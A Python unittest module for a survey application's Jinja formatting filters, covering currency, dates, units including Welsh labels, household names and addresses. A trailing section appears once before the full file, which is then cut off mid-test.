self.assertEqual(format_unit_input_label('area-hectare'), 'ha')
self.assertEqual(format_unit_input_label('area-acre'), 'ac')
self.assertEqual(format_unit_input_label('volume-cubic-meter'), 'm³')
self.assertEqual(format_unit_input_label('volume-cubic-centimeter'), 'cm³')
self.assertEqual(format_unit_input_label('volume-liter'), 'l')
self.assertEqual(format_unit_input_label('volume-hectoliter'), 'hl')
self.assertEqual(format_unit_input_label('volume-megaliter'), 'Ml')
self.assertEqual(format_unit_input_label('duration-hour'), 'hr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'hours')
self.assertEqual(format_unit_input_label('duration-year'), 'yr')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_input_label_welsh(self):
self.assertEqual(format_unit_input_label('duration-hour'), 'awr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'awr')
self.assertEqual(format_unit_input_label('duration-year'), 'bl')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'flynedd')
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
def test_get_question_title_with_title_value(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title'
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question'
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer',
'label': 'answer_label'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title',
'answers': [{
'id': 'answer'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer'
}]
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'default_question_title')
def test_offset_date_from_day(self):
test_cases = [
# (Input Date, offset, day of week, expected output)
('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday
            ('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday input returns the previous Sunday (taken from the last whole week)
('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday
('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset
            ('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous Sunday with +1 week offset, back to the input date
('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday
('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input
('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks
('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs previous Friday + nothing
('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year
('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day
]
for case in test_cases:
self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
def test_bad_day_of_week_offset_date_from_day(self):
with self.assertRaises(Exception):
calculate_offset_from_weekday_in_last_whole_week('2018-08-10', {}, 'BA')
def test_offset_date_defaults_to_now_if_date_not_passed(self):
with patch('app.jinja_filters.datetime') as mock_datetime:
# pylint: disable=unnecessary-lambda
mock_datetime.utcnow.return_value = datetime(2018, 8, 10)
mock_datetime.strftime.side_effect = lambda *args, **kw: datetime.strftime(*args, **kw)
result = calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU')
self.assertEqual(result, '2018-08-05')
def test_format_date_custom(self):
test_cases = [
            # Input Date, date format, expected output
('2018-08-14', 'EEEE d MMMM YYYY', 'Tuesday 14 August 2018'),
('2018-08-14', 'EEEE d MMMM', 'Tuesday 14 August'),
('2018-08-14', 'EEEE d', 'Tuesday 14'),
('2018-08-14', 'd MMMM YYYY', '14 August 2018'),
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_custom(self.autoescape_context, *case[0:2]),
"<span class='date'>{}</span>".format(case[2])
)
def test_format_date_range_no_repeated_month_year(self):
test_cases = [
# Start Date, End Date, Date Format, Output Expected First, Output Expected Second
('2018-08-14', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 14', 'Thursday 16 August 2018'),
('2018-07-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 31 July', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Sunday 31 December 2017', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'MMMM YYYY', 'December 2017', 'August 2018'),
('2018-08-14', '2018-08-16', 'MMMM YYYY', 'August 2018', 'August 2018'),
('2017-12-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2017-07-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2018-08-14', '2018-08-16', 'EEEE d', 'Tuesday 14', 'Thursday 16')
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_range_no_repeated_month_year(self.autoescape_context, *case[0:3]),
"<span class='date'>{}</span> to <span class='date'>{}</span>".format(case[3], case[4])
)
@patch('app.jinja_filters.format_unordered_list')
def test_format_repeated_summaries_unformatted(self, patched_format): # pylint: disable=no-self-use
test_cases = [
# (input list, expected output)
([['John', 'Smith'], [['Jane', 'Sarah'], ['Smith', 'Smythe']]], ['<NAME>', '<NAME>', '<NAME>']),
([['John', 'Smith']], ['<NAME>']),
([['John', 'Smith'], ['Andy', 'Smith'], ['David', 'Smith']], ['<NAME>', '<NAME>', '<NAME>']),
([[['Jane', 'Sarah'], ['Smith', 'Smith']]], ['<NAME>', '<NAME>']),
([[['David', 'Sarah'], ['Smith', 'Smith']]], ['<NAME>', '<NAME>']),
([[['David', 'Sarah'], ['', 'Smith']]], ['David', '<NAME>']),
([['John', 'Smith'], [[], []]], ['<NAME>'])
]
for case in test_cases:
format_repeating_summary(None, case[0])
# Format unordered list takes a list of lists
patched_format.assert_called_with(None, [[Markup(x) for x in case[1]]])
def test_format_repeated_summaries_no_input(self):
self.assertEqual('', format_repeating_summary(None, []))
def test_format_repeated_summaries_delimiters(self):
self.autoescape_context = Mock(autoescape=True)
output = format_repeating_summary(self.autoescape_context, [['', '51 Testing Gardens', '', 'Bristol', 'BS9 1AW']], delimiter=', ')
self.assertEqual(output, '<ul><li>51 Testing Gardens, Bristol, BS9 1AW</li></ul>')
def test_format_address_list_undefined_values(self):
user_entered_address = [Undefined(), Undefined(), Undefined(), Undefined(), Undefined()]
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_missing_values(self):
user_entered_address = ['44', 'Testing', '', 'Swansea', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Swansea',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_None_value(self):
user_entered_address = [None, None, None, None, None]
metadata_address = [None, None, None, None, None]
with self.assertRaises(Exception):
format_address_list(user_entered_address, metadata_address)
def test_format_address_list_no_values_in_answer(self):
user_entered_address = ['', '', '', '', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_no_metadata(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = []
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_concatenated_list_no_values(self):
answer_address = ['', '', '']
metadata_address = ['', '', '']
with self.assertRaises(Exception) as error:
format_address_list(answer_address, metadata_address)
self.assertEqual('No valid address passed to format_address_list filter', error.exception.args[0])
| # coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
class TestJinjaFilters(AppContextTestCase): # pylint: disable=too-many-public-methods
def setUp(self):
self.autoescape_context = Mock(autoescape=True)
super(TestJinjaFilters, self).setUp()
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency_for_input(self):
self.assertEqual(format_currency_for_input('100', 2), '100.00')
self.assertEqual(format_currency_for_input('100.0', 2), '100.00')
self.assertEqual(format_currency_for_input('100.00', 2), '100.00')
self.assertEqual(format_currency_for_input('1000'), '1,000')
self.assertEqual(format_currency_for_input('10000'), '10,000')
self.assertEqual(format_currency_for_input('100000000'), '100,000,000')
self.assertEqual(format_currency_for_input('100000000', 2), '100,000,000.00')
self.assertEqual(format_currency_for_input(0, 2), '0.00')
self.assertEqual(format_currency_for_input(0), '0')
self.assertEqual(format_currency_for_input(''), '')
self.assertEqual(format_currency_for_input(None), '')
self.assertEqual(format_currency_for_input(Undefined()), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_get_currency_symbol(self):
self.assertEqual(get_currency_symbol('GBP'), '£')
self.assertEqual(get_currency_symbol('EUR'), '€')
self.assertEqual(get_currency_symbol('USD'), 'US$')
self.assertEqual(get_currency_symbol('JPY'), 'JP¥')
self.assertEqual(get_currency_symbol(''), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency(self):
self.assertEqual(format_currency(self.autoescape_context, '11', 'GBP'), "<span class='date'>£11.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '11.99', 'GBP'), "<span class='date'>£11.99</span>")
self.assertEqual(format_currency(self.autoescape_context, '11000', 'USD'), "<span class='date'>US$11,000.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0.00), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '', ), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, None), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, Undefined()), "<span class='date'></span>")
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_number(self):
self.assertEqual(format_number(123), '123')
self.assertEqual(format_number('123.4'), '123.4')
self.assertEqual(format_number('123.40'), '123.4')
self.assertEqual(format_number('1000'), '1,000')
self.assertEqual(format_number('10000'), '10,000')
self.assertEqual(format_number('100000000'), '100,000,000')
self.assertEqual(format_number(0), '0')
self.assertEqual(format_number(0.00), '0')
self.assertEqual(format_number(''), '')
self.assertEqual(format_number(None), '')
self.assertEqual(format_number(Undefined()), '')
def test_format_multilined_string_matches_carriage_return(self):
# Given
new_line = 'this is on a new\rline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_new_line(self):
# Given
new_line = 'this is on a new\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_carriage_return_new_line(self):
# Given
new_line = 'this is on a new\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string(self):
# Given
new_line = 'this is\ron a\nnew\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is<br>on a<br>new<br>line')
def test_format_multilined_string_auto_escape(self):
# Given
new_line = '<'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(str(format_value), '<')
def test_get_current_date(self):
# Given
date_format = '%-d %B %Y'
# When
format_value = get_current_date(self.autoescape_context)
current_date = as_london_tz(datetime.utcnow()).strftime(date_format)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=current_date))
def test_format_date(self):
# Given
date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_date_month_year(self):
# Given
date = '2017-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_markup(self):
# Given
date = [Markup('2017-01')]
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_non_string(self):
# Given
date = 123
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, 123)
def test_format_date_none(self):
# Given
date = None
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertIsNone(format_value)
def test_format_date_time_in_bst(self):
# Given
date_time = '2018-03-29T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>29 March 2018 at 12:59</span>")
def test_format_date_time_in_gmt(self):
# Given
date_time = '2018-10-28T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>28 October 2018 at 11:59</span>")
def test_format_conditional_date_not_date(self):
        # Given (no integer test here; that check was removed from jinja_filters)
invalid_input = [('1', None),
('1-1-1', None)]
# When
for nonsense in invalid_input:
date1 = nonsense[0]
date2 = nonsense[1]
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertIn("does not match format '%Y-%m'", str(exception.exception))
def test_format_conditional_date_not_set(self):
# Given
# When
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, None, None)
# Then
self.assertIn('No valid dates passed to format_conditional_dates filter', str(exception.exception))
def test_format_conditional_date(self):
# Given
datelist = [('2016-01-12', '2016-02-12', '12 January 2016'),
('2017-12-23', None, '23 December 2017'),
(None, '2017-12-24', '24 December 2017')]
# When
with self.app_request_context('/'):
for triple in datelist:
date1 = triple[0]
date2 = triple[1]
format_value = format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=triple[2]))
def test_calculate_years_difference(self):
with patch('app.setup.get_session_store', return_value=None):
# Given
ten_years_ago = (datetime.today()+relativedelta(years=-10)).strftime('%Y-%m-%d')
date_list = [('2017-01-30', '2018-01-30', '1 year'),
('2015-02-02', '2018-02-01', '2 years'),
('2016-02-29', '2017-02-28', '1 year'),
('2016-02-29', '2020-02-28', '3 years'),
(ten_years_ago, 'now', '10 years')]
for dates in date_list:
start_date = dates[0]
end_date = dates[1]
# When
calculated_value = calculate_years_difference(start_date, end_date)
# Then
self.assertEqual(calculated_value, dates[2])
def test_calculate_years_difference_none(self):
# Given
with self.assertRaises(Exception) as e:
# When
calculate_years_difference(None, '2017-01-17')
# Then
self.assertEqual('Valid date(s) not passed to calculate_years_difference filter', str(e.exception))
def test_format_date_range(self):
# Given
start_date = '2017-01-01'
end_date = '2017-01-31'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date, end_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span> to <span class='date'>31 January 2017</span>")
def test_format_date_range_missing_end_date(self):
# Given
start_date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_household_member_name(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_no_surname(self):
# Given
name = ['John', '']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_surname_is_none(self):
# Given
name = ['John', None]
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_no_first_name(self):
# Given
name = ['', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_name_is_none(self):
# Given
name = [None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_middle_and_last(self):
# Given
name = ['John', 'J', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_no_middle_name(self):
# Given
name = ['John', '', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_middle_name_is_none(self):
# Given
name = ['John', None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_trim_spaces(self):
# Given
name = ['John ', ' Doe ']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_possessive(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, '<NAME>\u2019s')
def test_format_household_member_name_possessive_with_no_names(self):
# Given
name = [Undefined(), Undefined()]
# When
format_value = format_household_member_name_possessive(name)
self.assertIsNone(format_value)
def test_format_household_member_name_possessive_trailing_s(self):
# Given
name = ['John', 'Does']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, '<NAME>\u2019')
def test_concatenated_list(self):
# Given
list_items = ['1 The ONS', 'Newport', 'NP108XG']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_concatenated_list_one_entry(self):
# Given
list_items = ['One entry']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, 'One entry')
def test_concatenated_list_trim_white_spaces_and_trailing_commas(self):
# Given
list_items = ['', '1 The ONS ', 'Newport ', ' NP108XG', '']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_format_percentage(self):
self.assertEqual(format_percentage('100'), '100%')
self.assertEqual(format_percentage(100), '100%')
self.assertEqual(format_percentage(4.5), '4.5%')
def test_format_number_to_alphabetic_letter(self):
self.assertEqual(format_number_to_alphabetic_letter(0), 'a')
self.assertEqual(format_number_to_alphabetic_letter(4), 'e')
self.assertEqual(format_number_to_alphabetic_letter(25), 'z')
self.assertEqual(format_number_to_alphabetic_letter(-1), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit(self):
self.assertEqual(format_unit('length-meter', 100), '100 m')
self.assertEqual(format_unit('length-centimeter', 100), '100 cm')
self.assertEqual(format_unit('length-mile', 100), '100 mi')
self.assertEqual(format_unit('length-kilometer', 100), '100 km')
self.assertEqual(format_unit('area-square-meter', 100), '100 m²')
self.assertEqual(format_unit('area-square-centimeter', 100), '100 cm²')
self.assertEqual(format_unit('area-square-kilometer', 100), '100 km²')
self.assertEqual(format_unit('area-square-mile', 100), '100 sq mi')
self.assertEqual(format_unit('area-hectare', 100), '100 ha')
self.assertEqual(format_unit('area-acre', 100), '100 ac')
self.assertEqual(format_unit('volume-cubic-meter', 100), '100 m³')
self.assertEqual(format_unit('volume-cubic-centimeter', 100), '100 cm³')
self.assertEqual(format_unit('volume-liter', 100), '100 l')
self.assertEqual(format_unit('volume-hectoliter', 100), '100 hl')
self.assertEqual(format_unit('volume-megaliter', 100), '100 Ml')
self.assertEqual(format_unit('duration-hour', 100), '100 hrs')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 hours')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_welsh(self):
self.assertEqual(format_unit('duration-hour', 100), '100 awr')
self.assertEqual(format_unit('duration-year', 100), '100 bl')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 awr')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 mlynedd')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit_input_label(self):
self.assertEqual(format_unit_input_label('length-meter'), 'm')
self.assertEqual(format_unit_input_label('length-centimeter'), 'cm')
self.assertEqual(format_unit_input_label('length-mile'), 'mi')
self.assertEqual(format_unit_input_label('length-kilometer'), 'km')
self.assertEqual(format_unit_input_label('area-square-meter'), 'm²')
self.assertEqual(format_unit_input_label('area-square-centimeter'), 'cm²')
self.assertEqual(format_unit_input_label('area-square-kilometer'), 'km²')
self.assertEqual(format_unit_input_label('area-square-mile'), 'sq mi')
self.assertEqual(format_unit_input_label('area-hectare'), 'ha')
self.assertEqual(format_unit_input_label('area-acre'), 'ac')
self.assertEqual(format_unit_input_label('volume-cubic-meter'), 'm³')
self.assertEqual(format_unit_input_label('volume-cubic-centimeter'), 'cm³')
self.assertEqual(format_unit_input_label('volume-liter'), 'l')
self.assertEqual(format_unit_input_label('volume-hectoliter'), 'hl')
self.assertEqual(format_unit_input_label('volume-megaliter'), 'Ml')
self.assertEqual(format_unit_input_label('duration-hour'), 'hr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'hours')
self.assertEqual(format_unit_input_label('duration-year'), 'yr')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_input_label_welsh(self):
self.assertEqual(format_unit_input_label('duration-hour'), 'awr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'awr')
self.assertEqual(format_unit_input_label('duration-year'), 'bl')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'flynedd')
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
